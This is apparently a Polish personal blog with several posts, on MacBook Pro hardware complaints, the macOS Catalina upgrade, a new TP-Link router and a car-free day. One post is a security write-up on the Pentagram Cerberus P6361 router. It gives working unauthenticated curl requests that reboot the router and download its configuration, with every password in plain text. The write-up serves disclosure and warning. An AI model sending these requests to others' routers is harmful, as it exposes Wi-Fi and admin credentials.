Ergonomia maca

Yzoja napisała wpis o siedmiu miesiącach z macOS, a to przypomniało mi, że miałem w planie ponarzekać na maca. Nawet szkic notki miałem gotowy. Nie będzie jednak o systemie, a wyłącznie o hardware, w postaci MacBook Pro 13″. Na system przyjdzie jeszcze kiedyś czas. Dla przypomnienia: korzystam z niego w pracy od jakichś pięciu miesięcy, w domu Linux. Jeśli miałem się do czegoś przyzwyczaić, to już się przyzwyczaiłem, lepiej nie będzie.

MacBook Pro 13"
Źródło: https://www.engadget.com/2018/07/13/macbook-pro-2018-hands-on/

Na początek standard do narzekań – klawiatura. Klawisze mają mały skok, jest twarda. Nie przeszkadza mi to specjalnie, ale wolę tradycyjne, miękkie, o większym skoku. C’mon, w lapkach i tak jest krótki skok klawiszy w porównaniu z klawiaturami desktopowymi, zwłaszcza starego typu. Dodatkowo klawiatura się psuje, podobno. U mnie póki co działa, ale poczekajmy dwa lata…

Kolejna wada klawiatury to układ, czyli zamieszanie z klawiszami – brak delete, który przeżyłem zaskakująco dobrze, osobny control, który cały czas boli, bo raz trzeba używać control, raz command, a jeśli ktoś używa VMek ze środowiskiem graficznym, to już zupełnie robi się cyrk. Brak funkcyjnych i escape o co widziałem żale – nie boli, bowiem można ustawić, by były domyślnie, cały czas na wyświetlaczu, a głośność itp. po naciśnięciu Fn. Jeśli ktoś tęskni za fizycznym escape i funkcyjnymi to polecam wypróbowanie tego ustawienia. Polecam też Karabiner do przemapowania klawiszy, bez tego pisanie polskich znaków może być bolesne. Podświetlanie jest oczywiście fajne, ale konkurencja (choćby Dell) też ma.

Czy komputer może być zbyt płaski? Brzmi paradoksalnie, ale tak, może. Na początku miałem spory problem z podniesieniem maca jedną ręką – nie ma za co chwycić, w związku z czym potrafił się przesunąć, zwłaszcza na bardziej śliskich powierzchniach. Detal i ostatecznie się nauczyłem poprzez zahaczenie czubkami palców o wcięcie, ale nadal – miało być fajnie, a w praktyce tak sobie. I żeby nie było – nie mam grubych palców.

Porty USB-C umieszczone są zbyt blisko siebie. Jeśli wetkniemy dwie wtyczki, nie można złapać wtyczki, trzeba ciągnąć za kabel lub podnosić laptopa i łapać od spodu. W zwykłych lapkach, ze zwykłymi USB nie miałem tego problemu. Możliwe, że związane z poprzednim akapitem albo ogólna wada USB-C – nie mam porównania dla innych maszyn z tymi portami. Niemniej problem występuje. Szczęśliwie można mieć stację dokującą i podłączać jeden kabel i wtedy wszystko gra. W wersji bardziej mobilnej z kolei pewnie będzie dostęp w pionie. Ale co szkodziło projektantom dać centymetr dodatkowej przestrzeni między portami? Nie wiem.

Ekran. To najlepszy glare z jakim miałem do czynienia, ale… to nadal glare, a ja nie przepadam za glare. Palcuje się jak głupi i nieco robi za lusterko. Z tym ostatnim można walczyć zwiększając jasność i nawet jest opcja automatycznego dostosowania jasności w zależności od otoczenia, z której korzystam. Działa zacnie, tylko czasami lekko wariuje i co parę sekund (sic!) zmienia temperaturę barwy ekranu. Zdecydowanie ktoś nie znał pojęcia histereza. Ale to już zejście ze sprzętu na system, a to nie ten wpis.

Czy narzekanie na wychwalany wszędzie touchpad jest możliwe? Ano jest. Wada? Brak fizycznych przycisków. Prawy klik nie jest pewny – żeby zrobić prawy klik, trzeba zrobić mocniejsze przyciśnięcie. Żeby zrobić mocniejsze przyciśnięcie, trzeba zrobić słabsze, czyli lewy klik. To teraz wyobraźmy sobie, że mamy link, który bardzo chcemy skopiować, ale którego bardzo nie chcemy kliknąć. Zdecydowanie pewniej czuję się z podpiętą myszką. Zwykłą pecetową, zresztą. Tyle, że nie chodzę z myszą w kieszeni. Oddając sprawiedliwość, poza brakiem fizycznych przycisków to naprawdę dobry touchpad: duży, precyzyjny, wygodny. Jeśli jest sposób, który pozwala pewnie wyeliminować ryzyko lewokliku przed prawoklikiem na touchpadzie – dajcie znać proszę.

Kolejny nietypowy zarzut – stosunkowo krótki czas pracy na baterii. Ja rozumiem, że to tylko 13″, w dodatku płaskie, ale czemu ludzie chwalą, że maci trzymają długo na baterii? W porównaniu z Dellami, z którymi miałem do czynienia, mac wypada blado. Benchmarku nie robiłem, ale przewidywany czas pracy, który widzę, to między 3 a 5 godzin na baterii, przy zwykłym użytkowaniu. Czternastocalowy Dell o porównywalnych parametrach miał bardziej 6-8h.

Ostatnia wada – zamknięcie magnetyczne i brak możliwości sensownego umieszczenia zasłony na kamerkę. Są fajne nakładane silikonowe zaślepki na kamery, które rewelacyjnie sprawdzają się na tradycyjnych laptopach, ale niestety ich używanie na macu powoduje, że zamknięcie magnetyczne działa mało pewnie. Zasłonki w postaci naklejki są inwazyjne i też mają swoją grubość, a producent sam z siebie niczego nie zaoferował. Jeśli znacie sposób na zasłonięcie kamery – poproszę.

I tyle w kwestii hardware’u, póki co. Rzeczy oczywiste typu wszystko niewymienne, nierozbieralne i pointegrowane, o których piszą wszędzie pominąłem. Dla jasności, to co opisałem to nie są wielkie wady, po prostu sprzęt daleki jest od ideału. Najbardziej w praktyce doskwiera mi układ klawiatury. Jeśli ktoś korzysta tylko z maców, może się przestawić i przestać zwracać uwagę.

Gdybym jednak miał wybór i musiał korzystać z macOS, to wolałbym chyba hackintosha z hardware 14″ Della, ze względów czysto ergonomicznych. A gdybym najkrócej jak się da mógł opisać zmiany, dzięki którym MacBook Pro byłby IMO lepszy to: ekran 14″, matowy, miękka klawiatura o większym skoku, 3-4 milimetry grubości więcej i dłuższy czas pracy na baterii.

Catalina

Na początku października została wydana nowa wersja macOS o nazwie kodowej Catalina. Zaktualizowałem wczoraj i z okazji tego, że to mój pierwszy upgrade tego systemu, postanowiłem podzielić się wrażeniami z aktualizacji. Notka z tego jak mi się żyje z macOS nadal jest w planach, w trzech słowach: szału nie ma.

Aktualizacja z opóźnieniem, powody były dwa. Po pierwsze, nie ma tam żadnej zmiany, której specjalnie potrzebuję. Z rzeczy które mnie potencjalnie dotykają widzę koniec wsparcia dla aplikacji 32-bit, zsh jako domyślna powłoka oraz lepsze security za sprawą dodatkowych uprawnień. Po drugie, czekałem na zielone światło od zespołu zajmującego się desktopami w firmie, który sprawdzał, czy soft potrzebny do pracy działa poprawnie. Zresztą wśród użytkowników maków zauważyłem tendencję do tego, by po wydaniu nowej wersji chwilę poczekać, na ujawnienie ew. błędów i ich poprawki.

Przyznaję, że sama aktualizacja jest zrobiona sprawnie, przebiega czytelnie i dość szybko. Dodatkowo przez większość czasu można normalnie pracować na systemie. Na szybkim łączu i dysku SSD pobranie 8 GB i instalacja zajęły nieco ponad godzinę, co uznaję za dobry wynik. Podobny czas zajmuje zaktualizowanie desktopu z Debianem. Pobranie, rozpakowanie, reboot, dłuższe uruchamianie i… jest. I działa.

Za to po instalacji trochę dzieją się cuda. Po części wynikają ze zmiany w security – trzeba pozwalać konkretnym programom na konkretne akcje, ale po części są to zwykłe niedociągnięcia. Przykładowo jedna z pierwszych rzeczy, które mnie spotkały to:

git diff
xcrun: error: invalid active developer path (/Library/Developer/CommandLineTools), missing xcrun at: /Library/Developer/CommandLineTools/usr/bin/xcrun

Rozumiem, że rozwiązanie jest proste i łatwe do znalezienia, ale szukanie po forach rozwiązania problemu dla czegoś, co powinno się zaktualizować wraz z systemem, bo pochodzi od tego samego wydawcy i można było przewidzieć, że wymaga aktualizacji, skoro jest zainstalowane? Słabe.

Zapowiadanej zmiany powłoki na zsh jeszcze nie doświadczyłem – okazało się, że dla istniejących kont zostaje bash. Można wymusić zmianę ręcznie, co pewnie za jakiś czas zrobię.

W ogóle model zarządzania aktualizacjami aplikacji (nie mylić z systemem) pod macOS jest fatalny, zbliżony do Windowsowego, gdzie każda aplikacja żyje własnym życiem. Centralny manager pakietów, instalacja z użyciem repozytoriów i aktualizacje w jednym miejscu, znane z Linuksa są dużo łatwiejsze i wygodniejsze.

UPDATE Pochwaliłem za wcześnie. Dziś dostałem info, że dostępna jest aktualizacja do 10.15.1. Zacytuję opis z forum:

macOS Catalina 10.15.1 is a fairly significant update, introducing new emoji characters that were added in iOS 13.2 earlier this week, adding support for the AirPods Pro that are launching tomorrow, and bringing Siri privacy controls to the Mac to allow users to opt out of sharing their Siri recordings with Apple.

Jeśli ktoś przypuszcza, że jest mi to wszystko totalnie obojętne, to ma rację. Aktualizacja emoji zajęła pół godziny. I tym razem uważam, że to trochę sporo, skoro chodzi o takie drobiazgi.

Pentagram Cerberus P6361 – rzut okiem na bezpieczeństwo

tl;dr Router starawy, bezpieczeństwo żadne, Pentagram to Tenda.

Razem z laptopem rodzice kupili parę lat temu router, właśnie tytułowy Pentagram Cerberus P6361. Byłem lekko zły, że nie konsultowali ze mną zakupu, ale kupili go za grosze, nie wiem czy nie w Biedronce. Obejrzałem go, stwierdziłem, że co prawda OpenWrt się nie da zainstalować, ale sensowne minimum jest (802.11n, możliwość włączenia WPA2 i wyłączenia WPS), więc został, pełniąc tak naprawdę rolę AP, za routerem na Raspberry Pi. Pobór prądu znikomy, sprzęt działał zaskakująco stabilnie, z racji tego, że był w sieci lokalnej, logowanie tylko po HTTP nie miało większego znaczenia.

Często się słyszy o słabych zabezpieczeniach w routerach, zwłaszcza producentów specjalizujących się w tańszym sprzęcie, więc przy stwierdziłem, że poszukam błędów w ramach zabawy. Uruchomiłem Burp, zalogowałem się do routera i postanowiłem zrobić najprostszą rzecz, czyli zresetować router. Request trochę mnie zaskoczył, bo po skopiowaniu jako komenda curl wyglądał następująco:

curl -i -s -k -X $'GET' \
-H $'Host: 192.168.1.1:8081' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://192.168.1.1:8081/system_reboot.asp' -H $'If-Modified-Since: 0' -H $'Cookie: language=en; admin:language=en' -H $'Connection: close' \
-b $'language=en; admin:language=en' \
$'http://192.168.1.1:8081/goform/SysToolReboot'

Zgadza się, nie ma tam żadnych danych związanych z sesją. Uruchomienie polecenia w konsoli, poza przeglądarką i następujący po tym reboot potwierdzają – po prostu wysyłamy request a router bez żadnego uwierzytelniania wykonuje polecenie.

No dobrze, to tylko reboot, czy można zrobić coś ciekawszego? Stwierdziłem, że najważniejsze co można z routera uzyskać, to hasło administratora i hasło do WiFi. Cerberus P6361 posiada możliwość backupu konfiguracji. Efektem jej pobrania jest plik tekstowy, zawierający otwartym tekstem pełną konfigurację, włącznie z wszystkimi hasłami. Zaskoczenia nie było – również ją można pobrać bez uwierzytelniania:

curl -i -s -k -X $'GET'     -H $'Host: 192.168.1.1:8081' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://192.168.1.1:8081/system_backup.asp' -H $'Cookie: language=en; admin:language=en' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1'     -b $'language=en; admin:language=en'     $'http://192.168.1.1:8081/cgi-bin/DownloadCfg/RouterCfm.cfg' 

Game over. Przyznaję, że po tym, co zobaczyłem, odeszła mnie ochota na dalszą zabawę, przynajmniej z tą wersją firmware:

Current system version: V5.07.18_pl_PEN; Publishing date: Nov 7 2011
Software version V5.07.18_pl_PEN
Hardware version V1.0

Pamiętałem, że dawno temu pobrałem nowszą wersję firmware’u (V5.07.21), ale nie zaktualizowałem go z braku czasu. Postanowiłem sprawdzić na stronie producenta, czy są nowsze wersje, żeby zaktualizować i sprawdzić przed zgłoszeniem czy bug nadal występuje i… niespodzianka. Strona producenta zniknęła. Liczyłem, że znajdę jakieś linki do firmware w necie, poszperałem więc nieco i okazało się, że Pentagram to tak naprawdę Tenda (co łatwo można potwierdzić na podstawie MAC adresu), czyli producent, którego routery zawierają mnóstwo podatności tego typu[1]. W znacznie nowszym firmware, którego, nawiasem nie widzę do pobrania ze strony producenta – jest 5.07.46 z 2013. Przy czym opieram się na tym, że wersja i rozmiar fimware są podobne, pewności, że Pentagram Cerberus P6361 to Tenda W316R nie mam, routera zepsuć nie chcę, więc chwilowo nie wymieniam – pobawię się intensywniej jak znajdę zastępcę.

Część smutna. Domyślnie router udostępnia interfejs do zarządzania na wszystkich interfejsach (adres 0.0.0.0) i wygląda, że nie ma dostępnego załatanego firmware’u. Rzut oka na portale z używanym sprzętem pokazuje, że sporo ludzi sprzedaje te routery. Ceny od 20 zł w górę. Jak się ktoś bardzo postara, to i nowy w sklepie znajdzie. Polecam kupić coś innego. Jeśli ktoś musi używać ww. routera, polecam pokombinować z niewystawianiem panelu zarządzania czy to przez zmianę adresu na którym słucha, czy trickiem z przekierowaniem portu opisanym przy podobnej okazji[2]. Wygląda na bardzo podobny błąd.

Przy czym najlepiej tego typu podatny router wymienić (co przy najbliższej okazji uczynię, choć jest używany sporadycznie), ponieważ za sprawą CSRF atak można wykonać od strony sieci LAN, więc brak wystawionego na świat interfejsu nie do końca zabezpiecza przed wykonaniem zdalnego ataku.

Shodan zwrócił zaskakująco mało wyników, ZoomEye nieco więcej, ale przypuszczam, że te sprzęty po prostu mają się już ku schyłkowi (patrz [2]). Ew. złe zapytania zrobiłem – niestety w tej chwili nie mam już dostępu do routera. Zdecydowałem się opisać, bo zabawa i przednia, i prosta, exploit opublikowany był jeszcze w zeszłym roku, choć sprzęt starawy, a o dziurach w routerze zawsze warto przypomnieć – może ktoś załata/wymieni.

[1] Zmiana serwerów DNS jest kolejną ważną rzeczą. W sumie ważniejszą, niż hasło do WiFi, zwł. jeśli mowa o zdalnym sprzęcie.
[2] Aktualnie zapytanie zwraca poniżej 7 tys. wyników. W masową aktualizację nie wierzę, czyżby sprzęty nie przeżywały 6 lat? W sumie w tym przypadku dobrze…

Nowy router (TP-Link Archer C50)

Poprzedni router wytrzymał cztery lata. Jakiś czas temu zaczął się wieszać – 50% strat pakietów po WiFi, pomagał restart prądowy. Nie było to może bardzo częste, ale na tyle drażniło, że dopisałem nawet codzienny reboot w cronie. Co zmniejszyło problem, ale go nie rozwiązało. I w ogóle problem jakby się nasilał. Od strony systemu (OpenWrt) nic ciekawego w logach, przełożenie w chłodniejsze miejsce, tj. zdjęcie z modemu kablowe jakby trochę pomogło, więc podejrzewam albo przegrzewanie się, albo wysychający kondensator. Tylko nie pasuje mi do tej teorii reset rozwiązujący problem na losowy okres czasu.

Teoretycznie nic, z czym nie mógłbym powalczyć, ale… trochę szkoda czasu. No i są inne powody. Po pierwsze, poprzedni router już się zwrócił. Po drugie jest to wspaniały pretekst do wymiany sprzętu na coś z 5 GHz, bo na 2,4 GHz od dawna robi się tłoczno, a coraz więcej sprzętów obsługuje 5 GHz. Wreszcie zajrzałem na stronę OpenWrt i tam wszędzie warningi, że sprzęty z 4 MB flash lub 32 MB RAM przestają być wspierane. Swoją drogą, może właśnie to była przyczyna niestabilności? Szczególnie, że trochę przeładowany softem i ogólnie na krawędzi był, zdecydowanie wbrew zaleceniom, jak je teraz czytam.

Tak czy inaczej, kupiłem sprzęt. Wybór był nieco skomplikowany, choć wymagania miałem proste: 8 MB flash, 64 MB RAM, wsparcie dla 5 GHz i 802.11ac i oczywiście wsparcie przez OpenWrt. Szybko ustaliłem, że jednym z tańszych urządzeń dostępnych w Polsce spełniających kryteria jest TP-Link Archer C50. Jednak żeby nie było zbyt prosto, okazało się, że wsparcie jest zależne od wersji hardware. Ogólnie nie rozumiem tej mody wśród producentów, żeby robić wiele różnych urządzeń z tą samą nazwą. Wersja hardware spokojnie mogła by być ujęta w nazwie, przynajmniej klient od razu wiedziałby, co kupuje.

Wyszło mi, że potrzebuję albo v3, albo v4. Przy czym sprzęt jest w zasadzie ten sam, a główny problem jest z formatem obrazu – prawdopodobnie v4 nie dorobi się „klikalnej” wersji obrazu na stronie i trzeba będzie się bawić w samodzielne składanie obrazu. Nie jest to jednak coś, co spędza mi sen z powiek.

Na Allegro nie jest łatwo ustalić wersję hardware. Mało który sprzedawca chwali się wprost. Zadałem pytanie o wersję chyba czterem albo pięciu, odpisał jeden. I kupiłbym tam, gdyby nie fakt, że zdążył zakończyć sprzedaż. Chociaż w sklepie na stronie nadal były dostępne. Ostatecznie kupiłem u innego sprzedawcy kota w worku. Kot okazał się być v4.

Tradycyjnie nie przechodziłem na OpenWrt od razu, tylko dałem szansę firmware’owi producenta. Okazało się, że wgrany jest najnowszy dostępny. Tradycyjnie dostępnych wiele opcji konfiguracyjnych. Można nawet wybrać z GUI cykliczny reboot, czego nie było w poprzednich wersjach. Można zdefiniować tryb nocny, kiedy diody mają być wyłączone i ustalić – niezależnie – moc każdej z kart sieciowych (low-medium-high). Wygląda to naprawdę przyzwoicie. Dwa zakresy oznaczają de facto dwa niezależne interfejsy sieciowe i prawdopodobnie dwie oddzielne karty z dwiema antenami każda. Obie sieci ustawiłem na średnią moc.

Ogólnie po trzech tygodniach korzystania jestem zadowolony. Na razie zostaje firmware producenta. Jak na sprzęt za 110 zł działa bardzo fajnie i stabilnie. Tam gdzie to możliwe korzystam z 5 GHz. Pokazuje niby słabszy sygnał, niż na 2,4 GHz ale działa bardzo dobrze i speedtest na luzie, powtarzalnie, pokazuje zarówno maksymalny upload, jak i download w stosunku do tego co oferuje ISP.

Testy szybkości sieci wewnętrznej i pomiary poboru prądu – jak mi się przypomni.

Dzień bez znaczenia

Dziś w Wielkopolsce z okazji Europejskiego Tygodnia Zrównoważonego Transportu był Dzień bez Samochodu. W związku z tym każdy posiadacz ważnego dowodu rejestracyjnego mógł podróżować bezpłatnie autobusami i tramwajami oraz pociągami Kolei Wielkopolskich i Przewozów Regionalnych na terenie województwa.

Idea piękna, inicjatywa prowadzona od kilku lat, ale… wprowadzona ulga nie ma już znaczenia, tak naprawdę. I nie musi przekładać się w żaden sposób na spadek podróżujących samochodami. System można bowiem zhackować: o ile dotychczas dowód rejestracyjny był niezbędny do jazdy samochodem[1], o tyle od października 2018 nie jest już wymagany. Więc jedna osoba w rodzinie może pojechać jak dotychczas samochodem, a druga wziąć dowód rejestracyjny i jeździć komunikacją miejską za darmo.

Zastanawiam się, na ile to świadome działanie, a na ile bug systemu. Oraz czy nie było tak, że cała akcja była zrobiona z rozpędu. Może w przyszłym roku po prostu w Dniu bez Samochodu komunikacja miejska będzie za darmo? Zwyczajnie i po prostu, bez dodatkowych warunków?

[1] Przynajmniej zgodnie z prawem, bo jego brak groził mandatem.